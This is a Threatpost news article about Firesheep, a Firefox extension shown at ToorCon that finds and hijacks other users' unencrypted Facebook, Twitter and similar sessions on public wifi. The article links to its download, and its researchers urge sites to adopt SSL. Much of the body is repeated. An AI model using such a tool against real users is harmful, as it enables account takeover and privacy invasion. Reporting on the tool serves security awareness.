Subscribe to our Threatpost Today newsletter

Join thousands of people who receive the latest breaking cybersecurity news every day.

The administrator of your personal data will be Threatpost, Inc., 500 Unicorn Park, Woburn, MA 01801. Detailed information on the processing of personal data can be found in the privacy policy. In addition, you will find them in the message confirming the subscription to the newsletter.

*

*

I agree to my personal data being stored and used to receive the newsletter

*

I agree to accept information and occasional commercial offers from Threatpost partners

The administrator of your personal data will be Threatpost, Inc., 500 Unicorn Park, Woburn, MA 01801. Detailed information on the processing of personal data can be found in the privacy policy. In addition, you will find them in the message confirming the subscription to the newsletter.

Plugin, FireSheep, Lays Open Web 2.0 Insecurity

HED: New Tool, FireSheep, Lays Open Web 2.0 InsecurityDEK: The Browser Plug In Offers One Click Session Hijacking for Popular Social Networking Apps. Creators call for better session security. It’s no secret that Web sessions that use the bare HTTP protocol to transmit and receive data are susceptible to a variety of security attacks. What’s less clear is how much information is floating out there in the either, especially with the rise of “Web 2.0” and rich social networking applications and other Web based sharing tools. But now a pair of researchers have created a tool to identify and capture the social networking sessions of those around you. The tool, a Firefox browser extension dubbed “Firesheep,” was demonstrated at the ToorCon Hacking Conference in San Diego on Sunday. Its primary purpose is to underscore the lack of effective transaction security for many popular social networking applications, including Facebook, Twitter, Flickr and iGoogle: allowing users to browse public wifi networks for active social networking sessions using those services, then take them over using a built-in “one-click” session hijacking feature. Firesheep works on unencrypted wireless LAN connections with services that do not use secure HTTP. The researchers, Ian Gallagher of Security Innovation in Seattle Washington, and Eric Butler, an independent security consultant, also of Seattle, demonstrated Firesheep before an audience at ToorCon on Sunday: surveying and then hijacking audience members’ Facebook and iGoogle sesions. They warned that, without wider use of secure transaction tools for end-to-end Web encryption like SSL, more users were likely to fall victim to such attacks. The problem isn’t new, Butler said, but has been the “elephant in the room” since the birth of the Web and the HTTP protocol that is its lingua franca. While technologies like virtual private networking tools (VPN) can help deter snooping, but don’t provide end to end encryption of Web sessions and, thus, just “move the problem around,” Butler said. Concerns about the ability to scale session encryption to the level needed to support traffic on massive social networks like Facebook is a likely obstacle, but both Gallagher and Butler argued that security and scalability can both be achieved. Search giant Google implemented SSL for its Gmail Web based e-mail service without any noticeable change in service and without having to deploy massive new infrastructure to support it, the two noted. Other Web mail and software as a service vendors should do the same. The two posted a version of the Firesheep tool for Mac OS X and Windows for download (http://github.com/codebutler/firesheep/downloads) and encouraged others to download and try it out. The tool is also extensible, allowing users to add additional Web services to those detected by Firesheep with a few lines of Javascript. It’s no secret that Web sessions that use the bare HTTP protocol to transmit and receive data are susceptible to a variety of security attacks. What’s less clear is how much information is floating out there in the ether, especially with the rise of “Web 2.0” and rich social networking applications and other Web based sharing tools.

HED: New Tool, FireSheep, Lays Open Web 2.0 Insecurity

DEK: The Browser Plug In Offers One Click Session Hijacking for Popular Social Networking Apps. Creators call for better session security.

It’s no secret that Web sessions that use the bare HTTP protocol to transmit and receive data are susceptible to a variety of security attacks. What’s less clear is how much information is floating out there in the either, especially with the rise of “Web 2.0” and rich social networking applications and other Web based sharing tools.

But now a pair of researchers have created a tool to identify and capture the social networking sessions of those around you. The tool, a Firefox browser extension dubbed “Firesheep,” was demonstrated at the ToorCon Hacking Conference in San Diego on Sunday. Its primary purpose is to underscore the lack of effective transaction security for many popular social networking applications, including Facebook, Twitter, Flickr and iGoogle: allowing users to browse public wifi networks for active social networking sessions using those services, then take them over using a built-in “one-click” session hijacking feature.

Firesheep works on unencrypted wireless LAN connections with services that do not use secure HTTP.

The researchers, Ian Gallagher of Security Innovation in Seattle Washington, and Eric Butler, an independent security consultant, also of Seattle, demonstrated Firesheep before an audience at ToorCon on Sunday: surveying and then hijacking audience members’ Facebook and iGoogle sesions. They warned that, without wider use of secure transaction tools for end-to-end Web encryption like SSL, more users were likely to fall victim to such attacks.

The problem isn’t new, Butler said, but has been the “elephant in the room” since the birth of the Web and the HTTP protocol that is its lingua franca. While technologies like virtual private networking tools (VPN) can help deter snooping, but don’t provide end to end encryption of Web sessions and, thus, just “move the problem around,” Butler said.

Concerns about the ability to scale session encryption to the level needed to support traffic on massive social networks like Facebook is a likely obstacle, but both Gallagher and Butler argued that security and scalability can both be achieved. Search giant Google implemented SSL for its Gmail Web based e-mail service without any noticeable change in service and without having to deploy massive new infrastructure to support it, the two noted. Other Web mail and software as a service vendors should do the same.

The two posted a version of the Firesheep tool for Mac OS X and Windows for download (http://github.com/codebutler/firesheep/downloads) and encouraged others to download and try it out. The tool is also extensible, allowing users to add additional Web services to those detected by Firesheep with a few lines of Javascript.

It’s no secret that Web sessions that use the bare HTTP protocol to transmit and receive data are susceptible to a variety of security attacks. What’s less clear is how much information is floating out there in the ether, especially with the rise of “Web 2.0” and rich social networking applications and other Web based sharing tools.

But now a pair of researchers have created a tool to identify and capture the social networking sessions of those around you. The tool, a Firefox browser extension dubbed “Firesheep,” was demonstrated at the ToorCon Hacking Conference in San Diego on Sunday. Its primary purpose is to underscore the lack of effective transaction security for many popular social networking applications, including Facebook, Twitter, Flickr and iGoogle: allowing users to browse public wifi networks for active social networking sessions using those services, then take them over using a built-in “one-click” session hijacking feature.

Firesheep works on unencrypted wireless LAN connections with services that do not use secure HTTP.

The researchers, Ian Gallagher of Security Innovation in Seattle Washington, and Eric Butler, an independent security consultant, also of Seattle, demonstrated Firesheep before an audience at ToorCon on Sunday: surveying and then hijacking audience members’ Facebook and iGoogle sessions. They warned that, without wider use of secure transaction tools for end-to-end Web encryption like SSL, more users were likely to fall victim to such attacks.

The problem isn’t new, Butler said, but has been the “elephant in the room” since the birth of the Web and the HTTP protocol that is its lingua franca. While technologies like virtual private networking tools (VPN) can help deter snooping, but don’t provide end to end encryption of Web sessions and, thus, just “move the problem around,” Butler said.

Concerns about the ability to scale session encryption to the level needed to support traffic on massive social networks like Facebook is a likely obstacle, but both Gallagher and Butler argued that security and scalability can both be achieved. Search giant Google implemented SSL for its Gmail Web based e-mail service without any noticeable change in service and without having to deploy massive new infrastructure to support it, the two noted. Other Web mail and software as a service vendors should do the same.

Authors

Threatpost

InfoSec Insider Post

InfoSec Insider content is written by a trusted community of Threatpost cybersecurity subject matter experts. Each contribution has a goal of bringing a unique voice to important cybersecurity topics. Content strives to be of the highest quality, objective and non-commercial.

Sponsored

Sponsored Post

Sponsored Content is paid for by an advertiser. Sponsored content is written and edited by members of our sponsor community. This content creates an opportunity for a sponsor to provide insight and commentary from their point-of-view directly to the Threatpost audience. The Threatpost editorial team does not participate in the writing or editing of Sponsored Content.